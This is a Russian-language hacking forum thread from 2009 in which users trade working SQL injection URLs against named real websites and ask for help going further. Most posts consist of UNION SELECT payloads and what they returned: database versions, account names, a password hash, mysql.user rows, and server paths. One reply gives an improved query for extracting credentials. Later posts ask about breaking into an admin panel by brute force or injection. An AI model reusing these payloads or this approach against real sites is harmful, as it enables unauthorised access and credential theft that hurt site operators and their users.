06.01.2009, 22:49
|
|
Познающий
Регистрация: 14.12.2007
Сообщений: 79
С нами:
9688243
Репутация:
75
|
|
Вообщем, дело такое.
тут я, вроде бы, что-то как-то разобрался:
http://www.gps-ru.ru/index.php?sn=-rbc805%27+union+select+1,2,3,4,5,6,7,concat_ws(0x3 a,version(),0x3a,user(),0x3a,database())/*
4.1.20 : grantsps@localhost : grantsps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.gps-ru.ru/index.php?sn=-rbc805%27+union+select+1,2,3,4,5,6,7,concat_ws(0x3 a,id,login,password)+from+users/*
1 : off-docnescott : 977dd41592714ff1b63f9ea806c6e150
gnutella
правда, куда этот логин/пасс втыкать не въехал (http://www.gps-ru.ru/admin не катит)
есть еще вот такое срамотный сайт:
http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat_ws(0x3a,version (),0x3a,user(),0x3a,database()),7,8,9,10,11,12,13, 14,15,16,17,18,19,20/*
>> 4.0.12-standard : glaad@localhost : glaad_www_1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat(user,0x3a,passw ord),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+m ysql.user+limit+0,1/*
>> root:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat(user,0x3a,host) ,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql .user+limit+0,1/*
>> andy : 66.28.254.%
вот во 2-м случае я не понял: кто такой andy[B]? и как бы мне найти логин/пароль как из 1-го случая.... |
|
|
06.01.2009, 23:42
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами:
10077446
Репутация:
1020
|
|
Сообщение от 4adr0s
Вообщем, дело такое.
тут я, вроде бы, что-то как-то разобрался:
правда, куда этот логин/пасс втыкать не въехал (http://www.gps-ru.ru/admin не катит)
а ты уверен что off-docnescott - это админ?
Сообщение от 4adr0s
вот во 2-м случае я не понял: кто такой andy[B]? и как бы мне найти логин/пароль как из 1-го случая....
поробу вот так:
http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat_ws(0x3a,user,pa ssword,host,file_priv) ,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql .user+where+host='%'/*
|
|
|
|
07.01.2009, 13:15
|
|
Познающий
Регистрация: 14.12.2007
Сообщений: 79
С нами:
9688243
Репутация:
75
|
|
Сообщение от AkyHa_MaTaTa
а ты уверен что off-docnescott - это админ?
поробу вот так:
http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat_ws(0x3a,user,pa ssword,host,file_priv) ,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql .user+where+host='%'/*
Не, не покатило.
Лан, продолжу ковырять...
|
|
|
|
06.01.2009, 23:36
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Сообщение от :o)
во-втором случае тебе нужно вручную подобрать колонку в которой хранится информация о пользователях системы типа user, по другому никак
Тебе флудом мозги съело? Он вручную будет подбирать дефолтную структуру таблицы мускуля? Омфг.
Код:
mysql> select column_name from information_schema.columns where table_name='mysql.user';
+-----------------------+
| column_name |
+-----------------------+
| Host |
| User |
| Password |
| Select_priv |
| Insert_priv |
| Update_priv |
| Delete_priv |
| Create_priv |
| Drop_priv |
| Reload_priv |
| Shutdown_priv |
| Process_priv |
| File_priv |
| Grant_priv |
| References_priv |
| Index_priv |
| Alter_priv |
| Show_db_priv |
| Super_priv |
| Create_tmp_table_priv |
| Lock_tables_priv |
| Execute_priv |
| Repl_slave_priv |
| Repl_client_priv |
| Create_view_priv |
| Show_view_priv |
| Create_routine_priv |
| Alter_routine_priv |
| Create_user_priv |
| ssl_type |
| ssl_cipher |
| x509_issuer |
| x509_subject |
| max_questions |
| max_updates |
| max_connections |
| max_user_connections |
+-----------------------+
37 rows in set
|
|
|
|
07.01.2009, 03:10
|
|
Познающий
Регистрация: 13.03.2007
Сообщений: 55
С нами:
10085912
Репутация:
17
|
|
это тоже самое
|
|
|
|
07.01.2009, 03:30
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
http://www.democracy.ru/article.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13,14,15,16+from+information_schema.tables+limit+ 176,20000--
помогите это докрутить =))
уже 2 часа епусь)) все таблицы перебрал и ничего =((
|
|
|
|
07.01.2009, 03:40
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
А чего там перебирать-то? Вот все данные, всего 244 таблицы, есть и интересные:
PHP код:
=============================
www.democracy.ru
75.101.142.224
=============================
-------
Версия MySQL:
5.0.45
-------
Имя базы:
iesd
-------
Юзер:
alex@localhost
-------
@@basedir:
/usr/
-------
@@datadir:
/var/lib/mysql/
-------
@@tmpdir:
/tmp/
-------
@@version_compile_os:
redhat-linux-gnu
-------
Список таблиц сюда не влез, скачать здесь можно:
http://slil.ru/26513292
дел на 4 минуты  |
|
|
|
07.01.2009, 07:52
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
http://www.heroeswm.ru/battlechat.php?warid[]=
Чё означает эта ошибка?
|
|
|
|
07.01.2009, 13:57
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами:
9477026
Репутация:
2362
|
|
Сообщение от Nightmarе
http://www.heroeswm.ru/battlechat.php?warid[]=
Чё означает эта ошибка?
Попытка привести вектор к скалярному типу. По-идее массив должен был привестись к int(1), но почему-то у них NOT_A_SCALAR_PLACEHOLDER_0. Видимо используют самописные функции для приведения к целочисленному типу.
Врядли там есть норм скуль-инъект.
|
|
|
|
07.01.2009, 08:23
|
|
Новичок
Регистрация: 16.03.2007
Сообщений: 24
С нами:
10081559
Репутация:
2
|
|
Не могли бы помочь глянуть в админку есть ли что нибкудь??
http://la2sfer.ru/admin/
что с ней можно сделать?
брут\инъеция...
еще вот что нашел:
http://la2sfer.ru/data/admin
http://la2sfer.ru/news (возможжно тоже пригодится, хотя search.php предусмотрительно удален)
Последний раз редактировалось lexus5122; 07.01.2009 в 08:29..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
